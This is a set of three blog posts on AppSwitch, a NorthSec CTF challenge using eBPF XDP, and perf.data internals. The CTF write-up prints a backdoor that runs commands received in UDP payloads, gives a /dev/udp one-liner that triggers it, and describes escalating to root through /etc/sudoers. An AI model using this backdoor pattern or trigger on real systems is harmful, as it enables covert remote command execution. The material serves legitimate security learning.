So, what’s this AppSwitch thing going around?

I recently read Jérôme Petazzoni’s blog post about a tool called AppSwitch, which made some Twitter waves on the busy interwebz. I was intrigued. It turns out that it was something I was familiar with. When I met Dinesh back in 2015 at Linux Plumbers in Seattle, he had presented me with a grand vision of how applications need to be free of any networking constraints and configurations, and how a uniform mechanism should evolve that makes such configurations transparent (I’d rather say opaque now). There are layers upon layers of network-related abstractions. Consider a simple network call made by a Java application. It goes through multiple layers in userspace (through the various libs, all the way to native calls from the JVM and eventually syscalls) and then multiple layers in kernel-space (syscall handlers to network subsystems and then to driver layers and over to the hardware). Virtualization adds 4x more layers. Each point in this chain does have a justifiable, unique configuration point. Fair point. But from an application’s perspective, it feels like fiddling with the knobs all the time:

Christmas Settings: https://xkcd.com/1620/

For example, we have of course grown around iptables and custom in-kernel and out-of-kernel load balancers, and have even pushed some of them to exceptional performance (such as XDP-based load balancing). But when it comes to data-path processing, doing nothing at all is much better than doing something very efficiently. Apps don’t really have to care about all these myriad layers anyway. So why not add another dimension to this and let the configuration be done at the app level itself? Interesting… 🤔

I casually asked Dinesh to see how far the idea had progressed and he ended up giving me a single binary and told me that’s it! It seems AppSwitch had finally been baked in the oven.

First Impressions

So, there is a single static binary named ax which runs as an executable as well as in daemon mode. It seems AppSwitch is distributed as a docker image as well, though. I don’t see any kernel module (unlike what Jérôme tested). This is definitely the userspace version of the same tech.

I used the ax docker image.  ax was both installed and running with one docker-run command.

$ docker run -d --pid=host --net=none -v /usr/bin:/usr/bin -v /var/run/appswitch:/var/run/appswitch --privileged docker.io/appswitch/ax 

Based on the documentation, this little binary seems to do a lot — service discovery, load balancing, network segmentation etc.  But I just tried the basic features in a single-node configuration.

Let’s run a Java webserver under ax.

# ax run --ip 1.2.3.4 -- java -jar SimpleWebServer.jar

This starts the webserver and assigns the IP 1.2.3.4 to it. It’s like overlaying the server’s own IP configuration through ax such that all requests are then redirected through 1.2.3.4. While idling, I didn’t see any resource consumption in the ax daemon. If it was monitoring system calls with auditd or something, I’d have noticed some CPU activity. Well, the server didn’t break, and when accessed via a client run through ax, it starts serving just fine.

# ax run --ip 5.6.7.8 -- curl -I 1.2.3.4

HTTP/1.0 500 OK
Date: Wed Mar 28 00:19:25 PDT 2018
Server: JibbleWebServer/1.0
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 58
Last-modified: Wed Mar 28 00:19:25 PDT 2018

Naaaice! 🙂 Why not try connecting with Firefox? Ok, wow, this works too!


I tried this with a Golang HTTP server (Caddy) that is statically linked. If ax was doing something like LD_PRELOAD, that would trip it up. This time I tried passing a name rather than the IP, and ran it as a regular user with the built-in --user option:

# ax run --myserver --user suchakra -- caddy -port 80

# ax run --user suchakra -- curl -I myserver
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=utf-8
Etag: "p6f4lv0"
Last-Modified: Fri, 30 Mar 2018 19:25:07 GMT
Server: Caddy
Date: Sat, 31 Mar 2018 01:52:28 GMT

So no kernel module tricks, it seems. I guess this explains why Jérôme called it a “Network Stack from the Future”. The future part here is applications, and with predominantly containerized deployments, the problems of microservices networking have really shifted nearer to the apps.

We need to get rid of the overhead caused by networking layers and the frequent context switches that happen as one containerized app communicates with another. AppSwitch could potentially eliminate all of this altogether, and the communication would actually resemble traditional socket-based IPC mechanisms, with the advantage of zero-overhead read/write cost once the connection is established. I think I would want to test this out thoroughly sometime in the future, if I get some time off from my bike trips 🙂

How does it work?

Frankly, I don’t know in-depth, but I can guess. All applications, containerized or not, are just a bunch of executables linked to libs (or built statically) running over the OS. When they need the OS’s help, they ask. To understand or morph an application’s behavior, the OS can tell us what is going on and provide interfaces to modify it. Auditd, for example, when configured, can allow us to monitor every syscall from a given process. Programmable LSMs can be used to set per-resource policies with the kernel’s help. For performance observability, tracing tools have traditionally allowed an insight into what goes on underneath. In the world of networking, we again take the OS’s help – routing and filtering strategies are still defined through iptables, with some advances happening in BPF-XDP. However, in the case of networking, calls such as connect() and accept() could be intercepted purely in userspace as well. But doing so robustly and efficiently, without application or kernel changes and with reasonable performance, has been a hard academic problem for decades [1][2]. There must be some other smart things at work underneath in ax to keep this robust enough for all kinds of apps. With the interception problem solved, this would allow ax to create a map and actually perform the ‘switching’ part (which I suppose justifies the AppSwitch name). I have tested it so far on Java, Go and Python servers. With network syscall interception seemingly working fine, the data then flows like a hot knife through butter. There may be some more features and techniques that I have missed, though. Going through ax --help, it seems there are some options for egress, WAN etc., but I haven’t played with those much.

References

[1] Practical analysis of stripped binary code [link]
[2] Analyzing Dynamic Binary Instrumentation Overhead [link]

An entertaining eBPF XDP adventure

In this post, I discuss the CTF competition track of NorthSec, an awesome security conference, and specifically our tale of collecting two elusive flags that happened to be based upon eBPF XDP technology – something that is bleeding edge and uber cool!

In case you did not know, eBPF eXpress Data Path (XDP) is redefining how network traffic is handled on devices. Filtering, routing and reshaping of incoming packets at a very early stage – even before the packets enter the Linux kernel’s networking stack – has allowed unprecedented speed and provides a base for applications in the security (DDoS mitigation), networking and performance domains. There is a lot of material from Quentin Monnet, Julia Evans, and the Cilium and IOVisor projects about what eBPF/XDP is capable of. For the uninitiated, generic information about eBPF can also be found on Brendan Gregg’s eBPF page and links. If you think you want to get serious about this, there are more links and detailed docs out there. In a recent talk I gave, I showed a diagram similar to the one below, as I started teasing myself with the possible avenues beyond the performance monitoring and tracing usecase that is dear to my heart:

TC with cls_bpf and XDP. Actions on packet data are taken at the driver level in XDP.

The full presentation is here. So, what’s interesting here is that the incoming packets from the net-device can now be statefully filtered or manipulated even before they reach the network stack. This has been made possible by the use of extended Berkeley Packet Filter (eBPF) programs, which allow such low-level actions at the driver level to be flexibly programmed in a safe manner from userspace. The programming is done in a restricted-C syntax that gets compiled to BPF bytecode by LLVM/Clang. The bpf() syscall then allows the bytecode to be attached at the proper place – here, these are the ‘hooks’ at ingress and egress of raw packets. Before getting attached, the program goes through a very strict verifier and an efficient JIT compiler that converts the BPF programs to native machine code (which is what makes eBPF pretty fast). Unlike the register struct context for eBPF programs attached to kprobes, the context passed to XDP eBPF programs is the XDP metadata struct. The data is directly read and parsed from within the BPF program, reshaped if required, and an action taken for it. The action can be either XDP_PASS, where the packet is passed on to the network stack as seen in the diagram; XDP_DROP, where it is dropped by essentially sending it back to the driver queue; or XDP_TX, which sends the packet back to the NIC it came from. While packet PASS and DROP can be good in scenarios such as filtering IPs, ports and packet contents, the TX usecase is more suited for load balancing, where the packet contents can be modified and transmitted back to the NIC. Currently, Facebook is exploring its use and presented their load balancing and DDoS prevention framework based on XDP at the recent Netdev 2.1 in Montreal. The Cilium project is another example of XDP’s use in container networking and security, and is an important project resulting from the eBPF tech.

NorthSec BPF Flag – Take One

Ok, enough of XDP basics for now. Coming back to the curious case of a fancy CTF challenge at NorthSec: we were presented with a VM and told that “Strange activity has been detected originating from the rao411 server, but our team has been unable to understand from where the commands are coming from, we need your help.” It was also explicitly stated that the machine was an up-to-date Ubuntu 17.04 with an unmodified kernel. Well, for me that is a pretty decent hint that this challenge would require kernel sorcery. Simon checked /var/log/syslog and saw suspicious prints every minute or two, caused by the /bin/true command being run. Pretty strange. We sat together and tried to use netcat to listen for network chatter on multiple ports, as we guessed that something was being sent from outside to the rao411 server. Is it possible that the packets were somehow being dropped even before they reached the network stack? We quickly realized that what we were seeing was indeed related to BPF, as we saw some files lying around in the VM (post CTF event, Julien Desfossez, who designed the challenge, has been generous enough to provide the code, which itself is based on Jesper Dangaard Brouer’s code in the kernel source tree). There were the familiar helper functions used for loading BPF programs and manipulating BPF maps. Apart from that, there was the xdp_nsec_kern.c file, which contained the BPF program itself! A pretty decent start it seems 🙂 Here is the code for the parse_port() function in the BPF XDP program, which is eventually called when a packet is encountered:


u32 parse_port(struct xdp_md *ctx, u8 proto, void *hdr)
{
    void *data_end = (void *)(long)ctx->data_end;
    struct udphdr *udph;
    u32 dport;
    char *cmd;
    unsigned long payload_offset;
    unsigned long payload_size;
    char *payload;
    u32 key = 0;

    if (proto != IPPROTO_UDP) {
        return XDP_PASS;
    }

    udph = hdr;
    if ((void *)(udph + 1) > data_end) {
        return XDP_ABORTED;
    }

    payload_offset = sizeof(struct udphdr);
    payload_size = ntohs(udph->len) - sizeof(struct udphdr);

    dport = ntohs(udph->dest);
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }

    if ((hdr + payload_offset + CMD_SIZE) > data_end) {
        return XDP_ABORTED;
    }
    cmd = bpf_map_lookup_elem(&nsec, &key);
    if (!cmd) {
        return XDP_PASS;
    }
    memset(cmd, 0, CMD_SIZE);
    payload = &((char *) hdr)[payload_offset];
    /* unrolled byte copy -- BPF verifiers of that era rejected loops */
    cmd[0] = payload[0];
    cmd[1] = payload[1];
    cmd[2] = payload[2];
    cmd[3] = payload[3];
    cmd[4] = payload[4];
    cmd[5] = payload[5];
    cmd[6] = payload[6];
    cmd[7] = payload[7];
    cmd[8] = payload[8];
    cmd[9] = payload[9];
    cmd[10] = payload[10];
    cmd[11] = payload[11];
    cmd[12] = payload[12];
    cmd[13] = payload[13];
    cmd[14] = payload[14];
    cmd[15] = payload[15];

    return XDP_PASS;
}

Hmmm… this is a lot of information. First, we observe that the destination port is extracted from the UDP header by the BPF program, and packets are only passed if the destination port is CMD_PORT (which turns out to be 9000, as defined in the header xdp_nsec_common.h). Note that the XDP actions happen very early, hence even if we were to listen at port 9000 using netcat, we would not see any activity. Another pretty interesting thing is that some payload from the packet is being used to prepare a cmd string. What could that be? Why would somebody prepare a command from a UDP packet? 😉

Let’s dig deeper. So, /var/log/syslog was saying that it is running xdp_nsec_cmdline intermittently, which executes /bin/true. Maybe there is something in that file? A short glimpse of xdp_nsec_cmdline.c confirms our line of thought! Here is a snippet from its main function:

int main(int argc, char **argv)
{
.
.
    cmd = malloc(CMD_SIZE * sizeof(char));
    fd_cmd = open_bpf_map(file_cmd);

    memset(cmd, 0, CMD_SIZE);
    ret = bpf_map_lookup_elem(fd_cmd, &key, cmd);
    printf("cmd: %s, ret = %d\n", cmd, ret);
    close(fd_cmd);
    ret = system(cmd);
.
.
}

The program opens the pinned BPF map file_cmd (which actually is /sys/fs/bpf/nsec), looks up the value stored there, and executes it. Such Safe. Much Wow. It seems we are very close. We just need to craft a UDP packet which updates the map with a command in its payload. The first flag was a file called flag which was not accessible by the logged-in raops user. So we just made a script in /tmp which changed the permissions on that file, and sent a UDP packet containing the path to our script.
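For illustration, here is a minimal C sketch of crafting such a packet – my own reconstruction, not code from the challenge; the destination address passed in would be whatever rao411 resolves to. It simply drops the command string into a single UDP datagram aimed at CMD_PORT:

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define CMD_PORT 9000  /* from xdp_nsec_common.h */

/* Send `cmd` as the raw payload of a single UDP datagram to ip:port.
 * The XDP program on the other side copies the first CMD_SIZE bytes
 * of this payload into the pinned BPF map. */
int send_cmd(const char *cmd, const char *ip, int port)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0)
        return -1;

    struct sockaddr_in dst;
    memset(&dst, 0, sizeof(dst));
    dst.sin_family = AF_INET;
    dst.sin_port = htons(port);
    inet_pton(AF_INET, ip, &dst.sin_addr);

    ssize_t n = sendto(s, cmd, strlen(cmd), 0,
                       (struct sockaddr *)&dst, sizeof(dst));
    close(s);
    return n < 0 ? -1 : 0;
}
```

During the CTF we actually used the even lazier bash redirection trick below.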

Trivia! Bash has a built-in way to send UDP packets:
echo -n "/tmp/a.sh" >/dev/udp/<rao411-ip>/9000

So, we now just had to wait for the program to run the xdp_nsec_cmdline which would trigger our script. And of course it worked! We opened the flag and submitted it. 6 points to InfoSecs!

NorthSec BPF Flag – Take Two

Of course, our immediate next action was to add the raops user to /etc/sudoers 😉 Once we had root access, we could recompile and re-insert the BPF program as we wished. Simon observed an interesting check in the BPF XDP program listed above that raised our brows:

...
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }
...

Why would someone want to explicitly drop packets coming in at 9001? Unless… there was a message being sent on that port from outside! While not an elegant approach, we just disabled the XDP_DROP check so that the packets would reach the network stack and we could simply netcat the data on that port. Recompile, re-insert, and it worked! The flag was indeed being sent to 9001, which was no longer dropped. 8 points to InfoSecs!

Mandatory cool graphic of us working

I really enjoyed this gamification of advanced kernel tech, as it increases its reach to young folks interested in Linux kernel internals and modern networking technologies. Thanks to Simon Marchi for seeing this through with me and to Francis Deslauriers for pointing out the challenge to us! Also, thanks to the NorthSec team (esp. Julien Desfossez and Michael Jeanson) who designed this challenge and made the competition more fun for me! In fact, Julien started on it while watching the XDP talks at Netdev 2.1. Also, thanks to the wonderful lads Marc-Andre, Ismael, Felix, Antoine and Alexandre from the University of Sherbrooke who kept the flag-chasing momentum going 🙂 It was a fun weekend! That’s all for now. If I get some more time, I’d write about an equally exciting LTTng CTF (Common Trace Format) challenge, which Simon cracked while I watched from the sidelines.

EDIT: Updated the above diagram to clarify that XDP filtering happens early, at the driver level – even before TC ingress and egress. TC with cls_bpf also allows BPF programs to be run; it was indeed a precursor to XDP.

Deconstructing Perf’s Data File

It is no mystery that Perf is like a giant organism written in C with an infinitely complex design. Of course, there is no such thing. Complexity is just a state of mind, they would say, and yes, it starts fading away as soon as you get enlightened. So, one fine day, I woke up and decided to understand how the perf.data file works, because I wanted to extract the Intel PT binary data from it. I approached Francis and we started off on an amazing adventure (which is still underway). If you are the impatient kind, here is the code.

A Gentle Intro to Perf

I would not delve deep into Perf right now. However, the basics are simple to grasp. It is like a Swiss army knife which contains tools to understand your system, from a very coarse to a quite fine level of granularity. It can go all the way from profiling and static/dynamic tracing to custom analyses built upon hardware performance counters. With custom scripts, you can generate call-stacks, Flame Graphs and what not! Many tracing tools such as LTTng also support adding perf contexts to their own traces. My personal experience with Perf has usually been just to profile small pieces of code. Sometimes I use its annotate feature to look at the disassembly and see instruction profiling right from my terminal. Occasionally, I use it to get immediate stats on system events such as syscalls. Its fantastic support in the Linux kernel, owing to the fact that it is tightly bound to each release, means that you can always have reliable information. Brendan Gregg has written so much about it as part of his awesome Linux performance tools posts. He has some actually useful stuff you can do with Perf. My post here just talks about some of its internals. So, if Perf was a dinosaur, I am just talking about its toe in this post.

Perf contains a kernel part and a userspace part. The userspace part is located in the kernel tree under tools/perf; the perf command that we use is compiled there. It reads kernel data from the Perf buffer based on the events you select for recording. For a list of all events you can use, do perf list or sudo perf list. The data from Perf’s buffer is then written to the perf.data file. For hardware traces, such as with Intel PT, the extra data is written to auxiliary buffers and saved to the data file. So to get your own custom stuff out of Perf, just read its data file. There are other ways too, like using scripts, but reading the binary directly allows for a better learning experience. The perf.data file is like a magical output file that contains a plethora of information, depending on what events you selected and how the perf record command was configured. With hardware tracing enabled, it can generate a 200MB+ file in 3–4 seconds (yes, seriously!). We first need to know how it is organized and how the binary is written.

Dissection Begins

Rather than going deep and trying to understand scripted ways to decipher this, we went all in and opened the file in a hex editor. The goal here was to learn how the Intel PT data can be extracted from the AUX buffers that Perf used and wrote to the perf.data file. By no means is this the only correct way to do it. There are more elegant solutions, I think, esp. if you look at some kernel documentation and the uapi perf_event.h file, or see these scripts for custom analysis. Even then, this can surely be a good example to tinker around more with Perf. Here is the workflow:

  1. Open the file as hex. I use either Vim with the :%!xxd command or Bless. This will come in handy later.
  2. Use perf report -D to keep track of how Perf is decoding and visualizing events in the data file in hex format.
  3. Run the above command under GDB, along with the whole Perf source code. It is in the tools/perf directory of the kernel source.

If you set up your IDE to debug, you would also have imported the Perf source code. Now we just start moving incrementally – looking at the bytes in the hex editor and correlating them with the magic perf report is doing in the debugger. You’ll see lots of bytes like these:


A cursory look tells us that the file starts with a magic – PERFILE2. Searching for it in the source code eventually leads to the structure that defines the file header:

 struct perf_file_header {
   u64 magic;
   u64 size;
   u64 attr_size;
   struct perf_file_section attrs;
   struct perf_file_section data;
   /* event_types is ignored */
   struct perf_file_section event_types;
   DECLARE_BITMAP(adds_features, HEADER_FEAT_BITS);
};

So we start by mmap-ing the whole file to buf and just typecasting it to this. The header->data element is an interesting thing. It contains an offset and size as part of the perf_file_section struct. We observe that the offset is near the start of some strings – probably some event information? Hmm… so let’s try to typecast this offset position in the mmap buffer (buf + pos) to the perf_event_header struct:

struct perf_event_header {
   __u32 type;
   __u16 misc;
   __u16 size;
};

For starters, let’s just print this h->type and see what the first event is. With our perf.data file, the perf report -D command as a reference tells us that it may be event type 70 (0x46) with 136 (0x88) bytes of data in it. Well, the hex says the same thing at the (buf + pos) offset. This is interesting! Probably we just found our event. Let’s just iterate over the whole buffer, adding h->size each time, and print the event types as well.

while (pos < file.size()) {
    struct perf_event_header *h = (struct perf_event_header *) (buf + pos);
    qDebug() << "Event Type" << h->type;
    qDebug() << "Event Size" << h->size;
    pos += h->size;
}

Nice! We have so many events – who knew? Perhaps the data file is not a mystery anymore. What are these event types, though? The perf_event.h file has a big enum with event types and some very useful documentation. Some more mucking around leads us to the following enum:

enum perf_user_event_type { /* above any possible kernel type */
    PERF_RECORD_USER_TYPE_START = 64,
    PERF_RECORD_HEADER_ATTR = 64, 
    PERF_RECORD_HEADER_EVENT_TYPE = 65, /* deprecated */
    PERF_RECORD_HEADER_TRACING_DATA = 66,
    PERF_RECORD_HEADER_BUILD_ID = 67,
    PERF_RECORD_FINISHED_ROUND = 68,
    PERF_RECORD_ID_INDEX = 69,
    PERF_RECORD_AUXTRACE_INFO = 70,
    PERF_RECORD_AUXTRACE = 71,
    PERF_RECORD_AUXTRACE_ERROR = 72,
    PERF_RECORD_HEADER_MAX
};

So event 70 was PERF_RECORD_AUXTRACE_INFO. Well, the Intel PT folks indicate in the documentation that they store the hardware trace data in an AUX buffer, and perf report -D also shows event 71 with some decoded PT data. Perhaps that is what we want. A little more fun with GDB on perf tells us that, while iterating, perf itself uses the union perf_event from event.h, which contains an auxtrace_event struct as well.

struct auxtrace_event {
    struct perf_event_header header;
    u64 size;
    u64 offset;
    u64 reference;
    u32 idx;
    u32 tid;
    u32 cpu;
    u32 reserved__; /* For alignment */
};

So, this is how they lay out the events in the file. Interesting. Well, it seems we can just look for event type 71, typecast it to this struct, extract the size bytes of trace data that follow, and move on. The Intel PT documentation further says that the AUX buffer is per-CPU, so we may need to extract separate files for each CPU, based on the cpu field in the struct. We do just that and get our extracted bytes as raw PT packets, which the CPUs generated when the intel_pt event was used with Perf.
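Putting it together, the extraction loop looks roughly like this – a simplified sketch over an in-memory buffer; the real tool would also start from the header’s data offset and write separate per-CPU files chosen by ev->cpu:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PERF_RECORD_AUXTRACE 71

struct perf_event_header {
    uint32_t type;
    uint16_t misc;
    uint16_t size;
};

/* Layout of PERF_RECORD_AUXTRACE; `size` bytes of raw hardware trace
 * data follow the record itself in the file. */
struct auxtrace_event {
    struct perf_event_header header;
    uint64_t size;
    uint64_t offset;
    uint64_t reference;
    uint32_t idx;
    uint32_t tid;
    uint32_t cpu;
    uint32_t reserved__;
};

/* Scan the event stream; for each AUXTRACE event, copy its trailing
 * trace payload into `out` and return the number of bytes extracted. */
size_t extract_auxtrace(const unsigned char *buf, size_t len,
                        unsigned char *out, size_t out_len)
{
    size_t pos = 0, copied = 0;
    while (pos + sizeof(struct perf_event_header) <= len) {
        const struct perf_event_header *h =
            (const struct perf_event_header *)(buf + pos);
        if (h->size == 0 || pos + h->size > len)
            break;
        if (h->type == PERF_RECORD_AUXTRACE) {
            const struct auxtrace_event *ev =
                (const struct auxtrace_event *)h;
            /* The payload sits right after the auxtrace_event record. */
            const unsigned char *payload = buf + pos + h->size;
            if (pos + h->size + ev->size > len)
                break;
            if (copied + ev->size <= out_len) {
                memcpy(out + copied, payload, ev->size);
                copied += ev->size;
            }
            pos += h->size + ev->size;  /* skip record + trace bytes */
        } else {
            pos += h->size;
        }
    }
    return copied;
}
```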

A Working Example

The above exercise was surprisingly easy once we had figured things out, so we did a small prototype for our lab’s research purposes. There are a lot of things we learnt. For example, the actual bytes for the header (containing event stats etc. – usually the thing that Perf prints on top if you do perf report --header) are actually written at the end of Perf’s data file. Or how the endianness of the file is determined from the magic. Just before the header at the end, there are some bytes (near event 68) which I still have not figured out how to handle. Perhaps it is too easy, and I just don’t know the big picture yet. We just assume there are no more events if the event size is 0 😉 Works for now. A more convenient way than this charade is to use scripts such as this for doing custom analyses. But I guess it is less fun than going all l33t on the data file.
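On the endianness point: perf’s v2 magic is written as the raw bytes "PERFILE2", so a reader that finds them reversed knows every field it reads afterwards needs byte-swapping. A tiny sketch of that check:

```c
#include <stdint.h>
#include <string.h>

enum byte_order { ORDER_NATIVE, ORDER_SWAPPED, ORDER_UNKNOWN };

/* The magic is stored as a u64, so a machine with the opposite
 * endianness sees the eight bytes in reverse order. Comparing against
 * both spellings tells us whether to swap the rest of the file. */
enum byte_order detect_order(uint64_t magic)
{
    if (memcmp(&magic, "PERFILE2", 8) == 0)
        return ORDER_NATIVE;
    if (memcmp(&magic, "2ELIFREP", 8) == 0)
        return ORDER_SWAPPED;
    return ORDER_UNKNOWN;
}
```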

I’ll try to get some more events out along with the Intel PT data and see what stuff is hidden inside. Also, Perf is quite tightly bound to the kernel for various reasons, and custom userspace APIs may not always be the safest solution. There is no guarantee that analyzing binary data from newer versions of Perf would always work with our experimental tool’s approach. I’ll keep you folks posted as I discover more about Perf internals.